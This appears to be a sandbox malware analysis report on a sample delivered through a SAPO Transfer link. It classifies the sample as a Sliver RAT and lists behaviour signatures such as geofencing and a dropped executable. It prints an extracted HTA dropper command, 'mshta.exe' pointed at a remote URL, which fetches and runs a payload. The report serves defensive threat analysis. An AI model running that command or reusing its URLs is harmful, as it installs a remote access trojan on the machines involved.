General

  • Target

    https://transfer.sapo.pt/downloads/59a7a12a-f30c-47ba-b9cd-5c16377db4aa/sapotransfer-62781136816c1O8/

  • Sample

    241125-wv78pszkew

Malware Config

Extracted

  • Language

    hta

  • Source

    "C:\Windows\System32\mshta.exe" https://0day.works/a

  • URLs (hta.dropper)

    https://0day.works/a

Targets

    • Target

      https://transfer.sapo.pt/downloads/59a7a12a-f30c-47ba-b9cd-5c16377db4aa/sapotransfer-62781136816c1O8/

    • Sliver RAT v2

    • Sliver family

    • SliverRAT

      SliverRAT is an open source Adversary Emulation Framework.

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • A potential corporate email address has been identified in the URL: currency-file@1

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

MITRE ATT&CK Enterprise v15

Tasks
